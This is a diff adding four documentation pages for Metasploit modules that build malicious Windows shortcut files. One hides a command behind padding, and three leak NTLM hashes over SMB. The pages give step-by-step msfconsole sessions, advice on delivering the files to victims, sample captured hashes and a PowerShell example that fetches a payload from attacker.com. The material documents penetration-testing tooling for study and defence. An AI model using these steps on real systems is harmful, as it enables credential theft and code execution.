rapid7
diff --git a/‎documentation/modules/auxiliary/fileformat/datablock_padding_lnk.md‎
Lines changed: 94 additions & 0 deletions b/‎documentation/modules/auxiliary/fileformat/datablock_padding_lnk.md‎
Lines changed: 94 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/fileformat/environment_variable_datablock_leak.md‎
Lines changed: 104 additions & 0 deletions b/‎documentation/modules/auxiliary/fileformat/environment_variable_datablock_leak.md‎
Lines changed: 104 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/fileformat/icon_environment_datablock_leak.md‎
Lines changed: 88 additions & 0 deletions b/‎documentation/modules/auxiliary/fileformat/icon_environment_datablock_leak.md‎
Lines changed: 88 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/fileformat/specialfolder_leak.md‎
Lines changed: 72 additions & 0 deletions b/‎documentation/modules/auxiliary/fileformat/specialfolder_leak.md‎
Lines changed: 72 additions & 0 deletions
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed.
+This can lead to arbitrary command execution via manipulated command line buffers.
+
+References:
+- [ZDI-CAN-25373](https://www.zerodayinitiative.com/advisories/ZDI-CAN-25373/)
+- [Windows LNK Research](https://zeifan.my/Windows-LNK/)
+- [Gist Example](https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1)
+- [Trend Micro Analysis](https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html)
+
+Disclosure Date: 2025-07-19.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file will be generated.
+1. Deliver the LNK file to the target Windows system.
+1. Open the LNK file to trigger command execution (e.g., launching calc.exe).
+
+## Options
+
+
+### COMMAND
+
+The command to execute when the LNK is opened.
+
+Default: `C:\\Windows\\System32\\calc.exe`
+
+Example:
+```
+set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"
+```
+
+### DESCRIPTION
+
+Optional description for the LNK file. If not set, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION Important Document
+```
+
+### ICON_PATH
+
+Optional path to an icon for the LNK file. If not set, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### BUFFER_SIZE
+
+The size of the whitespace padding buffer before the command (must be sufficient to avoid truncation).
+
+Default: 900
+
+Example:
+```
+set BUFFER_SIZE 1000
+```
+
+## Scenarios
+
+### Basic Command Execution on Windows
+
+Target: Any Windows system (e.g., Windows 10 or later).
+
+Generate an LNK that launches Calculator with custom padding:
+
+```
+msf > use auxiliary/fileformat/windows_lnk_padding
+msf auxiliary(fileformat/windows_lnk_padding) > set FILENAME calc.lnk
+FILENAME => calc.lnk
+msf auxiliary(fileformat/windows_lnk_padding) > set COMMAND C:\\Windows\\System32\\calc.exe
+COMMAND => C:\\Windows\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > set BUFFER_SIZE 900
+BUFFER_SIZE => 900
+msf auxiliary(fileformat/windows_lnk_padding) > set DESCRIPTION Calculator Shortcut
+DESCRIPTION => Calculator Shortcut
+msf auxiliary(fileformat/windows_lnk_padding) > set ICON_PATH %SystemRoot%\\System32\\calc.exe
+ICON_PATH => %SystemRoot%\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > run
+
+[*] Generating LNK file: calc.lnk
+[+] Successfully created calc.lnk
+[*] Command line buffer size: 900 bytes
+[*] Target command: C:\\Windows\\System32\\calc.exe
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus.
+This can result in NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-06.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or PADDING_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
+1. Deliver the LNK file to the target system.
+1. Right-click the LNK file in Explorer to trigger the SMB connection.
+1. Monitor the listener for captured NTLM hashes.
+
+## Options
+
+### DESCRIPTION
+
+The description for the shortcut.
+
+Default: `Testing Purposes`
+
+Example:
+```
+set DESCRIPTION Important File
+```
+
+### ICON_PATH
+
+The path to an icon for the LNK file.
+
+Default: `e.g. abc.ico`
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+## Scenarios
+
+### NTLM Hash Capture on Right-Click
+
+Target: Windows system with Explorer (e.g., Windows 10 or later).
+
+Generate the LNK file:
+
+```
+msf > use auxiliary/fileformat/right_click_lnk_leak
+msf auxiliary(fileformat/right_click_lnk_leak) > set DESCRIPTION Fake Document
+DESCRIPTION => Fake Document
+msf auxiliary(fileformat/right_click_lnk_leak) > set ICON_PATH %SystemRoot%\\System32\\imageres.dll
+ICON_PATH => %SystemRoot%\\System32\\imageres.dll
+msf auxiliary(fileformat/right_click_lnk_leak) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/right_click_lnk_leak) > run
+
+[*] Creating 'context.lnk' file...
+[+] LNK file created: context.lnk
+[*] Set up a listener (e.g., auxiliary/server/capture/smb) to capture the authentication
+[*] Auxiliary module execution completed
+```
+
+Set up the capture listener on the attacker machine:
+
+```
+msf > use auxiliary/server/capture/smb
+msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(server/capture/smb) > run
+[*] Server started.
+```
+
+Deliver `context.lnk` to the target. When the victim right-clicks it, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:08:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
+
+Use cracking tools to recover credentials from the hash.
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Windows systems using Explorer to browse directories with LNK files, where the IconEnvironmentDataBlock can force SMB authentication leaks.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-16.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
+1. Set options like FILENAME, or others as needed.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Place the LNK in a target directory.
+1. Browse the directory in Windows Explorer to trigger the SMB connection.
+1. Check the console for captured NTLM hashes.
+
+## Options
+
+
+### DESCRIPTION
+
+Optional description for the shortcut. If unset, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION System Update
+```
+
+### ICON_PATH
+
+Optional icon path for the LNK. If unset, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+
+## Scenarios
+
+### NTLM Hash Capture via Integrated Server
+
+Target: Windows system with Explorer.
+
+```
+msf > use auxiliary/fileformat/iconenvironmentdatablock_lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set FILENAME leak.lnk
+FILENAME => leak.lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set DESCRIPTION Fake Shortcut
+DESCRIPTION => Fake Shortcut
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > run
+
+[*] Creating 'leak.lnk' file...
+[+] LNK file created: leak.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver `leak.lnk` to a target folder. Browsing the folder triggers an SMB connection:
+
+```
+[*] SMB Captured - 2025-09-18 21:07:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:victim DOMAIN:VICTIMPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:samplehash
+NT_CLIENT_CHALLENGE:samplechallenge
+```
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut.
+This can lead to NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+- [Exploit-DB 42382](https://www.exploit-db.com/exploits/42382)
+
+Disclosure Date: 2025-05-10 (reported to MSRC).
+
+## Verification Steps
+
+1. Start msfconsole.
+2. Load the module: `use auxiliary/fileformat/specialfolderdatablock_lnk`.
+3. Customize options as needed (e.g., set FILENAME or APPNAME).
+4. Execute the module: `run`.
+5. A malicious LNK file will be generated.
+6. If not using a custom UNCPATH, the module starts an SMB capture server automatically.
+7. Place the LNK file in a directory on the target system.
+8. Browse to the directory in Windows Explorer to trigger the SMB connection.
+9. Monitor the console for captured NTLM hashes.
+
+## Options
+
+### APPNAME
+
+Sets the display name of the application in the LNK file. If empty, a random name is generated.
+
+Example:
+```
+set APPNAME FakeApp
+```
+
+
+## Scenarios
+
+### Basic NTLM Hash Capture on Windows
+
+Target: A Windows system with Explorer (e.g., Windows 10 or later).
+
+Attacker: Use the module to generate the LNK and capture hashes locally.
+
+```
+msf > use auxiliary/fileformat/specialfolderdatablock_lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set FILENAME malicious.lnk
+FILENAME => malicious.lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set APPNAME FakeApp
+APPNAME => FakeApp
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
+
+[*] Starting SMB server on 192.168.1.25:445
+[*] Generating malicious LNK file
+[+] malicious.lnk stored at /root/.msf4/local/malicious.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive).
+When the victim opens the containing folder in Explorer, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:03:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```